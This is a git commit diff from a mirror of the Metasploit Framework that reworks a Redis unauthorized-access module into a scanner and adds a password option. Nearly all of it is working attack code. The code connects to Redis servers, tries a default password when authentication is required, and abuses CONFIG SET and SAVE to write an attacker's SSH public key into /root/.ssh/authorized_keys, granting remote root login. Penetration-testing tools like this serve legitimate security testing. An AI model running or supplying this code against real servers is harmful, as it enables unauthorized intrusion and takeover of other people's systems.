1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

add a password option - AUTH_KEY

This commit is contained in:
nixawk 2015-12-10 08:24:47 +00:00
parent 28bc5b4d4f
commit 42013c18ba

View File

@ -5,10 +5,11 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
@ -23,19 +24,14 @@ class Metasploit3 < Msf::Exploit::Remote
['URL', 'http://antirez.com/news/96'],
['URL', 'http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/'],
['URL', 'http://redis.io/topics/protocol']
],
'Platform' => %w(unix linux),
'Targets' => [['Automatic Target', { }]],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 11 2015'
]
))
register_options(
[
Opt::RHOST(),
Opt::RPORT(6379),
OptPath.new('LocalFile', [true, 'Local file to be uploaded', '/root/.ssh/id_rsa.pub']),
OptString.new('RemoteFile', [true, 'Remote file path', '/root/.ssh/authorized_keys'])
OptString.new('RemoteFile', [true, 'Remote file path', '/root/.ssh/authorized_keys']),
OptString.new('AUTH_KEY', [false, 'Password for redis authentication', 'foobared'])
], self.class)
register_advanced_options(
@ -48,6 +44,10 @@ class Metasploit3 < Msf::Exploit::Remote
datastore['READ_TIMEOUT']
end
def peer
"#{rhost}:#{rport}"
end
def redis_proto(parts)
return if parts.blank?
command = "*#{parts.length}\r\n"
@ -63,62 +63,88 @@ class Metasploit3 < Msf::Exploit::Remote
sock.get_once(-1, read_timeout)
end
def auth?(password)
report_service(
host: rhost,
port: rport,
name: 'redis',
proto: 'tcp'
)
command = ['AUTH', "#{password}"]
data = send_command(command)
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
if data && data.include?('+OK')
true
else
false
end
end
def send_file(path, content)
report_service(
host: rhost,
port: rport,
name: 'redis',
proto: 'tcp'
)
dirname = File.dirname(path)
basename = File.basename(path)
key = Rex::Text.rand_text_alpha(32)
command = ['CONFIG', 'SET', 'DIR', "#{dirname}"]
data = send_command(command)
vprint_status("REDIS Command: #{command.join(' ')} - #{data.chop}")
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
return unless data.include?('+OK')
command = ['CONFIG', 'SET', 'dbfilename', "#{basename}"]
data = send_command(command)
vprint_status("REDIS Command: #{command.join(' ')} - #{data.chop}")
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
return unless data.include?('+OK')
command = ['SET', "#{key}", "#{content}"]
data = send_command(command)
vprint_status("REDIS Command: #{command.join(' ')} - #{data.chop}")
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
return unless data.include?('+OK')
print_good("#{rhost}:#{rport}: save file to #{path}")
report_note(
type: 'redis_unauth_file_upload',
host: rhost,
port: rport,
proto: 'tcp',
data: "Save it to #{path} on remote server successfully",
)
command = ['SAVE']
data = send_command(command)
vprint_status("REDIS Command: #{command.join(' ')} - #{data.chop}")
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
return unless data.include?('+OK')
command = ['DEL', "#{key}"]
data = send_command(command)
vprint_status("REDIS Command: #{command.join(' ')} - #{data.chop}")
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
return unless data.include?('+OK')
end
def check
connect
data = send_command(['INFO'])
disconnect
if data && data.include?('redis_mode')
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
def run_host(ip)
begin
connect
res = send_command(['PING'])
print_status("#{peer} - No Response") unless res
if res && res =~ /PONG/
if res =~ /PONG/
content = "\n\n#{File.open(datastore['LocalFile']).read}\n\n\n"
send_file(datastore['RemoteFile'], content)
elsif res =~ /NOAUTH Authentication required/
if auth?(datastore['AUTH_KEY'])
content = "\n\n#{File.open(datastore['LocalFile']).read}\n\n\n"
send_file(datastore['RemoteFile'], content)
end
end
rescue ::Exception => e
print_error("Unable to connect: #{e}")
print_error("#{e}")
ensure
disconnect
end